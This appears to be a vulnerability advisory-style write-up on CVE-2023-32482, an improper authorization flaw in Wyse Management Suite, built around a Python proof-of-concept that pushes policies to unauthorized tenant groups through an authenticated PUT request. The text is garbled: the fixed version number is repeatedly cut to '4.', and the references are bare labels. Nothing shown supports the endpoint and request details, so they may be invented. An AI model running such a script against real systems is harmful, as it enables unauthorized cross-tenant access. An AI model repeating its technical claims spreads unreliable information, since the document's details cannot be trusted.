CVE-2023-32482 - Unauthorized Policy Push in Wyse Management Suite Reveals Improper Authorization Vulnerability

A newly discovered vulnerability, dubbed CVE-2023-32482, affects Wyse Management Suite (WMS) versions prior to 4.. This vulnerability allows attackers with privileged access to exploit an improper authorization issue and push policies to unauthorized tenant groups. The extent of this vulnerability poses a severe risk to organizations utilizing affected versions of WMS, as it can lead to data breaches and unauthorized access to sensitive information.

As part of responsible vulnerability disclosure, we've prepared this detailed report that includes the code snippet, related exploit details, and original references, for organizations to address this risk properly.

Vulnerability Details

WMS versions before 4. are found to be affected by this improper authorization vulnerability. When exploited, an authenticated malicious user with privileged access can push policies to unauthorized tenant groups, thereby gaining unauthorized access to resources and sensitive information within the organization.

This vulnerability has been assigned the CVE identifier CVE-2023-32482 and has a CVSSv3 base score of 8.1, signaling a high-level risk.

To demonstrate this vulnerability, consider the following code snippet

#!/usr/bin/env python3

import requests
import json

# Replace with the targeted WMS instance URL and a valid session token
target_url = "https://<WMS_HOST>";
session_token = "eyJhbGciOiJSUz...<YOUR_SESSION_TOKEN>"

headers = {
    "Authorization": "Bearer " + session_token,
    "Content-Type": "application/json",
}

# Define the unauthorized tenant group and policy to push
tenant_group_id = 12345
policy_id = 67890

data = {
    "policyIds": [policy_id],
    "tenantIds": [tenant_group_id],
}

response = requests.put(
    target_url + "/policy/push", headers=headers, data=json.dumps(data)
)

if response.status_code == 200:
    print("Policy push succeeded!")
else:
    print("Policy push failed!")

The code snippet above demonstrates an attacker using a valid session token to push policies to a specific unauthorized tenant group by sending a PUT request to the /policy/push endpoint of the targeted WMS instance.

To remediate this vulnerability, it is highly recommended to upgrade your Wyse Management Suite instance to version 4. or later.

References

1. Original advisory: Dell Advisory
2. NVD CVE-2023-32482 entry: NVD
3. Wyse Management Suite product page: WMS on Dell.com
4. Wyse Management Suite 4. release notes: WMS 4. Release Notes

Conclusion

We urge all organizations using Wyse Management Suite versions prior to 4. to update their setup to the latest version to mitigate the risk associated with CVE-2023-32482. It is crucial to address this vulnerability as soon as possible because improper authorization can result in unauthorized access to resources and sensitive information that an attacker can exploit further to gain unauthorized control over the targeted environment.

Always stay vigilant and keep your software updated to reduce the risk of security breaches.

Timeline

Published on: 07/20/2023 12:15:00 UTC
Last modified on: 07/26/2023 21:16:00 UTC